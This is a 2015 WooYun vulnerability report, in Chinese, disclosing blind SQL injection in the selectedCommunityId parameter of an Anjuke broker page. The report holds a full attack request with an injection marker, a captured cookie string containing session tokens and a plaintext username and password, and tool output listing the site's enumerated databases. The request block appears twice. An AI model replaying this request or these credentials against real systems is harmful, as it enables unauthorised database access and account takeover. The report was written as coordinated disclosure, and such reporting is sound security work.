当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148249

漏洞标题:安居客重要站点存在严重SQL注射

相关厂商:安居客

漏洞作者: 沦沦

提交时间:2015-10-21 09:12

修复时间:2015-12-05 10:20

公开时间:2015-12-05 10:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-21: 细节已通知厂商并且等待厂商处理中
2015-10-21: 厂商已经确认,细节仅向厂商公开
2015-10-31: 细节向核心白帽子及相关领域专家公开
2015-11-10: 细节向普通白帽子公开
2015-11-20: 细节向实习白帽子公开
2015-12-05: 细节向公众公开

简要描述:

RT

详细说明:

GET /user/broker/ppc/marketanalysis/?selectedCommunityId=2440* HTTP/1.1
Host: my.anjuke.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://my.anjuke.com/user/broker/ppc/marketanalysis/?selectedCommunityId=2440
Cookie: td_cookie=414946580; aQQ_ajkguid=583D1A30-E7E6-6F90-C974-53BD80CDB19D; ctid=11; _ga=GA1.2.620016332.1445315740; Hm_lvt_c5899c8768ebee272710c9c5f365a6d8=1445315740,1445386343; __xsptplus8=8.2.1445386342.1445387388.2%233%7Cwww.wooyun.org%7C%7C%7C%7C%23%235Ra0azV6RqTKvJaOfo4bFconiglk4Sr5%23; lui=16143%3A2; history=%2Fapi%2Flogin%2Fsubmit%3Fusername%3Dzhangchao%26password%3D123456%26remember%3Dtrue%26callback%3Dwindow.user.callbackDetail; UserType=2; me=1; aQQ_modbbsadminauthinfos=v6opwQ9T7PHak4UGWTEZht0Ztl0iI0L%2FmFp3djulhG%2FNqxNSiZwt; aQQ_Memberauthinfos=4q8pkghW6aXak4UGWTEZht0Ztl0iI0L%2FlEZWc3yolk%2B%2Bkx5RiJ4tT7jICXc; aQQ_hzweb_uid=16143; aQQ_haozuusername=%E5%BC%A0%E8%B6%85%7Cbroker%7Chttp%3A%2F%2Fmy.anjuke.com%2Fmy%2Fhome%2F%7Chttp%3A%2F%2Fagent.anjuke.com%2Fmy%2Flogout%2F; aQQ_sid=Hilesc; sessid=CEA39F62-7870-327F-89ED-7CB10CB02C50; lps=http%3A%2F%2Fuser.anjuke.com%2Fmy%2Flogin%3Fhistory%3DaHR0cDovL2d1YW5nemhvdS5hbmp1a2UuY29tLw%3D%3D%7C; twe=2; ajk_member_captcha=540d7396be3856b18612ad89ad6835c1; Hm_lpvt_c5899c8768ebee272710c9c5f365a6d8=1445386343; aQQ_ajkauthinfos=v%2F56kQgBvPLak4UGWTE7h4s3gkRDJ0CelF57dSOr6XrBqxltjaUsS7z0M33vQ4cZSpEe6%2Fo9XiAMRay8ZQiDY8F9; usertype=2; ajk_member_id=16143; ajk_member_name=zhangchao; ajk_member_from=16143; ajk_member_key=16143; ajk_member_time=16143; aQQ_Brokerauthinfos=5f96xw9fuf%2FakoECXQ9S541E5w57dBvPyAwnGHyo11uB7koitJ0pS731MXDpTo8gcakZ6MA5YyUIf6G5bgmz; jp_member_id=123450; jp_auth_info=cf1485160f27c59a429e389b2df28a89; jp_auth_info_new=5qhxlAdTu6CQh9FKGlERi%2BMDuFMvYBfHyAgjInD5mAuD3w; NewGuide=5388%405%3AId%26301521%2CBI%265388%2CGT%265%2CGS%261; wendaexam_5388=144%2C0%2C0%2C0%7C146%2C0%2C0%2C0%7C147%2C0%2C0%2C0%7C149%2C0%2C0%2C0%7C150%2C0%2C0%2C0%7C155%2C0%2C0%2C0%7C157%2C0%2C0%2C0%7C161%2C0%2C0%2C0%7C162%2C0%2C0%2C0%7C164%2C0%2C0%2C0; wendaexamstart_5388=1445386456; PHPSESSID=kk6g4n1vtv30s2o1mtfacoacs4; als=0
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
If-Modified-Since: Wed,21 Oct 2015 08:30:09 GMT


selectedCommunityId参数可进行盲注

1.jpg


2.jpg


3.jpg


available databases [11]:
[*] aag_dw_stats
[*] ajk_dw_stats
[*] heartbeat_db
[*] hz_dw_stats
[*] if_dw_stats
[*] informatihn_schema
[*] jp_dw_stats
[*] mysql
[*] pepcona
[*] performance_schema
[*] test

漏洞证明:

GET /user/broker/ppc/marketanalysis/?selectedCommunityId=2440* HTTP/1.1
Host: my.anjuke.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://my.anjuke.com/user/broker/ppc/marketanalysis/?selectedCommunityId=2440
Cookie: td_cookie=414946580; aQQ_ajkguid=583D1A30-E7E6-6F90-C974-53BD80CDB19D; ctid=11; _ga=GA1.2.620016332.1445315740; Hm_lvt_c5899c8768ebee272710c9c5f365a6d8=1445315740,1445386343; __xsptplus8=8.2.1445386342.1445387388.2%233%7Cwww.wooyun.org%7C%7C%7C%7C%23%235Ra0azV6RqTKvJaOfo4bFconiglk4Sr5%23; lui=16143%3A2; history=%2Fapi%2Flogin%2Fsubmit%3Fusername%3Dzhangchao%26password%3D123456%26remember%3Dtrue%26callback%3Dwindow.user.callbackDetail; UserType=2; me=1; aQQ_modbbsadminauthinfos=v6opwQ9T7PHak4UGWTEZht0Ztl0iI0L%2FmFp3djulhG%2FNqxNSiZwt; aQQ_Memberauthinfos=4q8pkghW6aXak4UGWTEZht0Ztl0iI0L%2FlEZWc3yolk%2B%2Bkx5RiJ4tT7jICXc; aQQ_hzweb_uid=16143; aQQ_haozuusername=%E5%BC%A0%E8%B6%85%7Cbroker%7Chttp%3A%2F%2Fmy.anjuke.com%2Fmy%2Fhome%2F%7Chttp%3A%2F%2Fagent.anjuke.com%2Fmy%2Flogout%2F; aQQ_sid=Hilesc; sessid=CEA39F62-7870-327F-89ED-7CB10CB02C50; lps=http%3A%2F%2Fuser.anjuke.com%2Fmy%2Flogin%3Fhistory%3DaHR0cDovL2d1YW5nemhvdS5hbmp1a2UuY29tLw%3D%3D%7C; twe=2; ajk_member_captcha=540d7396be3856b18612ad89ad6835c1; Hm_lpvt_c5899c8768ebee272710c9c5f365a6d8=1445386343; aQQ_ajkauthinfos=v%2F56kQgBvPLak4UGWTE7h4s3gkRDJ0CelF57dSOr6XrBqxltjaUsS7z0M33vQ4cZSpEe6%2Fo9XiAMRay8ZQiDY8F9; usertype=2; ajk_member_id=16143; ajk_member_name=zhangchao; ajk_member_from=16143; ajk_member_key=16143; ajk_member_time=16143; aQQ_Brokerauthinfos=5f96xw9fuf%2FakoECXQ9S541E5w57dBvPyAwnGHyo11uB7koitJ0pS731MXDpTo8gcakZ6MA5YyUIf6G5bgmz; jp_member_id=123450; jp_auth_info=cf1485160f27c59a429e389b2df28a89; jp_auth_info_new=5qhxlAdTu6CQh9FKGlERi%2BMDuFMvYBfHyAgjInD5mAuD3w; NewGuide=5388%405%3AId%26301521%2CBI%265388%2CGT%265%2CGS%261; wendaexam_5388=144%2C0%2C0%2C0%7C146%2C0%2C0%2C0%7C147%2C0%2C0%2C0%7C149%2C0%2C0%2C0%7C150%2C0%2C0%2C0%7C155%2C0%2C0%2C0%7C157%2C0%2C0%2C0%7C161%2C0%2C0%2C0%7C162%2C0%2C0%2C0%7C164%2C0%2C0%2C0; wendaexamstart_5388=1445386456; PHPSESSID=kk6g4n1vtv30s2o1mtfacoacs4; als=0
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
If-Modified-Since: Wed,21 Oct 2015 08:30:09 GMT


selectedCommunityId参数可进行盲注

1.jpg


2.jpg


3.jpg


available databases [11]:
[*] aag_dw_stats
[*] ajk_dw_stats
[*] heartbeat_db
[*] hz_dw_stats
[*] if_dw_stats
[*] informatihn_schema
[*] jp_dw_stats
[*] mysql
[*] pepcona
[*] performance_schema
[*] test

修复方案:

过滤

版权声明:转载请注明来源 沦沦@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-10-21 10:19

厂商回复:

感谢对安居客的支持!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-10-21 09:32 | 泳少 ( 普通白帽子 | Rank:232 漏洞数:80 | ★ 梦想这条路踏上了,跪着也要...)

    师傅厉害